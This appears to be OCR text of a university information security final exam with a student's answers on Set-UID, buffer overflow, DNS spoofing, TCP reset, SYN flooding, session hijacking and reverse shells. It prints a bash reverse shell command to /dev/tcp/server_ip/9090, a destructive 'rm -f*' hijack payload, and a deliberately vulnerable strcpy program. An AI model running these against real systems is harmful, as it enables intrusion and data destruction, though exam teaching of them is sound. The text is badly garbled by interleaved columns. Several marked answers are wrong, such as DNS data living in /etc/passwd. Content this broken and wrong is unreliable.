Student ID 1.

The Set-UID privilege mechanism allows users to run a piece of a

1911562106 TP No./卷号：A
program with ( C ) permissions.
总分 A. Program executor B.Program Owner
Name C.The Root User D.Normal user
PARVEZ
Grade &Class 核分人 2. In the Linux operating system, a process has access control rights as
密 determined by the process's ( A ).
19lc 软工
A. Real User ID (RUID) B.Effective User ID (EUID)
C. Reserved user ID D.Root user ID
Note:
3. Race condition vulnerabilities usually occur ( D ).
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line

A. When a single process accesses a resource.

Hubei University of Technology B. When a single thread accesses a resource.
C. when a single user accesses a resource.
二 O 二一—二 O 二二学年第二学期期末考试 D. When multiple processes or threads access shared resources at the same
2021to 2022Academic Year2ndSemester, Final Exam time

Introduction of Information Security 4. Meltdown and Spectre attacks are essentially a form of attack
implemented using ( A ).
封 试题/Test Paper A. Buffer overflow vulnerability
B. Race condition vulnerability
（）闭卷/开卷
C. Set-UID privilege mechanism vulnerability
( )Open-book or Close Book
D. Network Protocol stack vulnerability

Q 5. Meltdown and Spectre attacks take advantage of the ( A )

I II III IV V VI VII VIII IX X characteristics of the CPU when executing program instructions.
No.
Q 20 10 30 40 A. Out Of Order B.Access permission check
Result C.encoding D.decoding
Your
Result
6. In the Linux operating system, the correspondence of the DNS
注意：学号、姓名和所在年级班级不写、不写全或写在密封线外者，试卷作废。 information is set in the ( C ) file.
Notice: Student ID, TSA and Grade & Class are not filled properly, the paper is A. /etc/hosts B./etc/local.d
invalid. C./etc/passwd D./etc/shadow

Result I. Single-choice questions (2 points for each question, 7. In a buffer overflow attack (32-bit operating system), the following ( C )
Reviewer 20 points in total) option does not serve as a valid jump address for the attacker.
A. 0xbffff250 B.0xbffff280 C.0xbffff300 D.0xbffff310
1
 16. An attacker can successfully implement a TCP SYN flooding attack with
Student ID
8. The program interface/library corresponding to the following ( A ) a fixed source IP address.（× ）
option cannot spoof network packets.
A. Socket B.Raw socket C.PCAP library D.All of the above options 17. Buffer overflow vulnerabilities can be avoided by using strncpy(),
Name
strncat().（√ ）
9. A 4-byte integer 0xAABBCCDD in a computer is stored at four locations
Grade &Class in the memory area addresses of 0x1000,0x1001,0x1002,0x10003 (started 18. The Socket type of the network communication program based on TCP
密 from 0x1000). If the computer has a big endian byte order, the following protocol is SOCK_STREAM.（√ ）
wrong statement is ( D ).
A. The 0xAA is stored in the 0x1000 B.The 0x BB is stored in 0x1001 19. In the Linux operating system, the privileged shell instruction for the
Note: C.The 0x CC is stored in the 0x1002 D.The 0x DD is stored in 0x1000 program TEST is: $sudo chmod 4755 TEST.（ √ ）
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line

10. For TCP Reset attack, the information NOT required to collect is ( D ). 20. The monitoring and forgery of data packets in ANY network can be
A. The Source IPAddress/Port B.Target IP address/port realized using network packet sniffing and spoofing techniques.（× ）
C. TCP package Sequence number D.Application layer data

Result
Reviewer
2. Judgment questions (1 point per question, a total of 10 points. Please mark
√ after the correct description and mark × after the wrong description.)
封
11. Once the program obtains privileges through the Set-UID mechanism,
the program has super user (root user) privileges.（ √ ）
12. In the Linux operating system, the user's password is stored in the
/etc/passwd file.（√ ）
13. Race condition vulnerabilities usually occur between detection (Time Of
Check) and use (Time Of Use) for a resource.（√ ）
Result
Reviewer
3. Short answer questions (6 points for each question, 30 points in total)
21. Please briefly describe the process and principles of DNS deception
attacks in a local network environment (Local DNS attacks).
Answer-21:-
Process of DNS deception:-
DNS deception means DNS spoofing is a collective term for a variety of
attack methods. The different methods are described below. The following
diagram explains the basics of DNS spoofing.

14. When a piece of data is read multiple times from a memory address, the
second read tends to be faster than the first, which is a phenomenon due to
the properties of CPU cache.（× ）

15. TCP Reset attacks can be effectively implemented on SSH connections.

（ √ ）

2
 22. Please briefly describe the principle of TCP reset attack combined with
the information in the figure below.

Answer-22:-
Spoofed RST Packet: The following fields need to be set correctly:
● Source IP address, Source Port,
● Destination IP address, Destination Port
● Sequence number (within the receiver’s window)
TCP Reset Attack on Telnet Connection
• d1. The client (e.g. the browser on the device) first requests the IP
address for the host name example.com from the DNS server.
• d2. The client receives a response to the request, but it contains a fake
IP address. The connection to the actual server for example.com is not
established.
• h1. Instead, the client sends the request to the malicious host behind
the faked IP address.
• h2. The malicious host returns what appears to be a legitimate website
page to the client. However, the fake domain name is missing the
security certificate which makes the attack visible.
• (A, B, C): These are different attack points for DNS spoofing: on the
client-side or local router, on the network connection, and on the DNS
server. TCP Reset Attack on SSH connections:-

Principles of DNS deception:-

Attackers use DNS deception that’s mean DNS spoofing
for phishing and pharming attacks with the goal of intercepting sensitive user
data. DNS spoofing makes the victim believe that they’ve ended up on a ● If the encryption is done at the network layer, the entire TCP packet
legitimate domain and uses the victim’s trust to infect them including the header is encrypted, which makes sniffing or spoofing
with malware and infect their own system. impossible.
3
 ● But as SSH conducts encryption at Transport layer, the TCP header
remains unencrypted. Hence the attack is successful as only header is
required for RST packet.
23. Please briefly describe the principle of TCP SYN flooding attack
combined with the information in the figure below.
Answer-23:-
A SYN flood (half-open attack) is a type of denial-of-service (DDoS) attack
which aims to make a server unavailable to legitimate traffic by consuming
all available server resources. By repeatedly sending initial connection
request (SYN) packets, the attacker is able to overwhelm all available ports
on a targeted server machine, causing the targeted device to respond to
legitimate traffic sluggishly or not at all.
According to information above SYN Flooding Attack
Idea:
To fill the queue storing the half-open connections so that there will be no
space to store TCB for any new half-open connection, basically the server
cannot accept any new SYN packets.
Steps:
● Do not finish the 3rd step of handshake as it will dequeue the TCB record.
● When flooding the server with SYN packets, we need to use random
source IP addresses; otherwise the attacks may be blocked by the firewalls.
● The SYN+ACK packets sent by the server may be dropped because forged
IP address may not be assigned to any machine. If it does reach an existing
4
machine, a RST packet will be sent out, and the TCB will be dequeued.
● As the second option is less likely to happen, TCB records will mostly stay
in the queue. This causes SYN Flooding Attack.
And then check tcp states before attacking
Lunch the attack targeting telnet server
SYN Fooding Atack- results.
SYN cookies—using cryptographic hashing, the server sends its SYN-ACK
response with a sequence number (seqno) that is constructed from the client
IP address, port number, and possibly other unique identifying information.
When the client responds, this hash is included in the ACK packet. The
server verifies the ACK, and only then allocates memory for the connection.
24. Describe the functions performed by these two statements:
read (5, data, 100);
write(3, data, 100);
Answer:-24-
The first line reads 100 bytes from the file represented by the file descriptor
5. The second line writes 100 bytes to the file represented by the file
descriptor 3.
25. The ALSR (Address Space Layout Randomization) mechanism can
make the buffer overflow attack more difficult to launch, please explain the
reason.
Answer-25:-
One of the critical steps in the attack is to find out the address of the
malicious code. If the memory is not randomized, each time we run the
program, the address will be the same. This makes investigation easy. The
ASLR technique changes that, so figuring out the address becomes difficult.
 corresponding area A,B,C,D of the foo() stack frame area in the figure
Student ID Result IV. Analysis questions (10 points for each respectively.
Reviewer question, 40 points in total)
(High address)
Name 26. Someone has written the C code as below(named: stack.c). Stack
grows
#include <stdlib.h>
main()
Grade &Class #include <stdio.h> stack frame

密 #include <string.h>
A

B
int foo(char *str)
C
{ foo()
Note: stack frame
D
char buffer[100];
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line

strcpy(buffer,str);
(Low address)
return 1;
}

int main(int argc, char **argv)

{
封 char str[400];
FILE *badfile;

badfile = fopen("badfile","r");
fread(str,sizeof(char),200,badfile); (2) Whether the stack.c code has a buffer overflow vulnerability? if so,
foo(str); explain the principle and process of the attack between the main () function
and the foo () function in the memory stack (you can add pictures to clarify
printf("returned Properly\n"); your point), and explain what measures can be taken to prevent this
return 1; vulnerability according to what we have learned during the class.
}

(1) The following figure shows the relative storage location map of the
main () function and the foo() function in the memory stack space. Please
specifically correlate the parameter str of the foo function(represented as
str), the variable buffer[] in foo() (represented as buffer[0] to
buffer[99]),the foo function return address(represented as Return address),
and the pre-frame pointer(represented as previous frame pointer) with the
5
 characters being input on the telnet terminal? What impact will the
Student ID
successful attack do to the Server after this attack?

Name

Grade &Class
密

Note:
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line

Answer-27(1):-
TCP/IP Hijacking is when an authorized user gains access to a genuine
network connection of another user. It is done in order to bypass the
password authentication which is normally the start of a session.
封 Firstly, user (10.0.2.68) and server (10.0.2.69) normally connected. And
there Sequence number #: X. and Y.

Then Attacker (10.0.2.70) has come there and it’s try to add some data by
27. As shown in the figure below, the legitimate user User (IP address: (rm –f*/n) payload: 8
10.0.2.68) is connecting to the server Server (IP address: 10.0.2.69) through And then the server Acknowledgement is changed to x+8. So, TCP session
telnet(a tcp-based connection), when the Attacker (IP address: 10.0.2.70) Hijiacking attack is execute.
successfully launched a TCP Session Hijacking attack on this telnet
connection. Then User would find that after 8 characters being input on the Answer-27(2):-
telnet terminal, he cannot enter any information anymore, and the telnet In here, attacker (10.0.2.70) to add some data by (rm –f*/n) payload: 8
terminal crashed. The network packet sniffing tool(wireshark, for example) Actually this code try delete all the file have on the server.
shows that after the attack is successful launched, any packets User sends to And also it’s change ACK:X+8 payload:10
Server are discarded by Server, and any packets Server sends back to User
are discarded by User as well.
(1) Please analyze and explain the cause of the occurrence of this
phenomenon, that is, the principle of TCP Session Hijacking attack;
(2) Why did the current telnet program freeze and then crash after 8
6
Package send to user from server but user not recived it cause it already
changed and so that user drop the package. And send another ack to server.
in here, user send to server plyload:1 and Seq: X but server find out it
stranger , server want to revived x+9 cause server send x+8. But now ,it’s
stranger server drop this package
now the full process will continue again and again. No one can recied any
package. So, Hijiacking attack successful.
Attacker(also a user) send this illegal instruction (rm –f*/n) payload:8
User and server ack changed for that reason both are drop all package
And also attacker try to delete all the file on this server. So it’s very dangers
attack TCP Hijiacking.
7
28. Assuming that machines A and B are in the same local network
(10.3.2.0/24), A sends out forged packets onto the network and B is
monitoring the packets in the local network. B observes the following
information: B can sniff packets with destination IP address 1.2.3.4 from A,
but B cannot sniff packets with destination IP address 10.3.2.30 from A.
Please answer the following questions:
(1) For B, what are the conditions to successfully sniff the information of
the local network?
(2) Please explain the cause of the above phenomenon.
Answer-28(1):-
(1): We spoof a packet using Victim IP as the source IP address and the UDP
server as the destination IP address. We transmit this packet to the UDP
server, and the server responds with an extremely large packet to the person
in question If we send a large number of such packets, this is an assault on
the wounded individual's system.
Answer-28(1):-
(2): If the packet destination is 10.3.2.30, the receiver is on the same net-
work. Before the packet is sent out, the sender's machine will send out ARP
requests, trying to get the MAC address of the receiver. The receiver
machine very likely does not exist on the network (or it is not up), so nobody
will answer the ARP request. Without knowing the MAC address of the
receiver, the spoofed packet will not be sent out. That is why Machine B will
not see the spoofed packet. If the packet destination is a host outside of the
network, then the sender needs to send the spoofed packet to a router. In its
ARP request, it will ask for the router's MAC address. Obviously, the router
is up, so the spoofed packet will be sent out.
(3) Combined with the above statement, explain the implementation
process of reverse shell attack;
(4) Combined with the relevant knowledge learned in our class, what
attacking methods can be used to successfully transmit and execute the
above reverse shell instruction on the server side?

Answer-29(1):-
1) The meaning of 0,1,2,>, <, & represented in the above statement given
below:
0 = standard input
1 = standard output
2 = standard error
>, < = redirection
& = redirect standard input

29. With the help of the network, the attacker can obtain the shell or root
shell of the remote server (Linux operating system-based) through the
reverse shell attack, and then get full control of the server. The typical
reverse shell instruction is as follows:
Answer-29(2):-
2) The interpretation of the / dev / t cp special device and the redirection
symbols is conducted by the outer shell shelLl. Since /dev/tcp is a built-in
virtual file for bash only (other shells do not recognize it), shelLl must be
bash. The inner shell program shelL2 does not need to be bash; other shell
programs also work.

/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1" 3) implementation process of reverse shell attack:

(1) Please explain the meaning of 0,1,2,>, <, & represented in the above Creates a copy of the file descriptor oldfp, and then assign newfd as the
statement; new file descriptor
(2) What does the attacker need to do on his machine in order to
successfully get the shell information output on the server side? And please
explain the meaning represented by /dev/tcp/server_ip/9090;
8

Reverse shell is executed via injected code
Can’t assume that the target machine runs bash
Run bash first:
the correct values for these two numbers; otherwise, the reply will not be
accepted. Without being able to sniff the query, attackers can onl y guess
these two numbers. The chance is one out of 232 for each guess. If an
attacker can send out I 000 spoofed queries in a second, it takes 50 days to
try 232 times. If an attacker uses a botnet of a thousand hosts to launch the
attack, it onl y takes 1.2 hour.
The above hypothetical attack has overlooked the cache effect. Because we
have to guess both the transaction ID and the source port number, it will be
hard for us to succeed on the tirst try. If we fail once, the real reply will
arrive and be cached by Lhe targeted local DNS server. To make another try,
we have to wait for the server to send out another DNS query, but
unfortunately, since it already knows the IP address from its cache, it will not
send out a query for the same name, until the cache times out. Such a cache
effect forces attackers to wait before they can make another attempt. The
waiting time can be hours or days, making remote DNS cache poisoning
attacks unrealistic.

Answer-29(4):-
By Remote DNS Cache Poisoning Attack attacking methods can be used to
successfully transmit and execute the above reverse shell instruction on the
server side.
The local DNS attack described in the previous secti on has a limitation, i.e.,
in order to sniff the victim's DNS query, the attacker machine and the vi ctim
machine must be on the same LAN. This poses a chall enge to remote
attackers, who are not able to see the DNS query. There are two data items in
a DNS query that are hard to get for remote attackers. The first item is the
source port number in the UDP header. DNS query is sent via a UDP packet,
the source port number of which is a 16-bit random number. The second item
is the 16-bit transaction ID in the DNS header. A spoofed reply must contain
9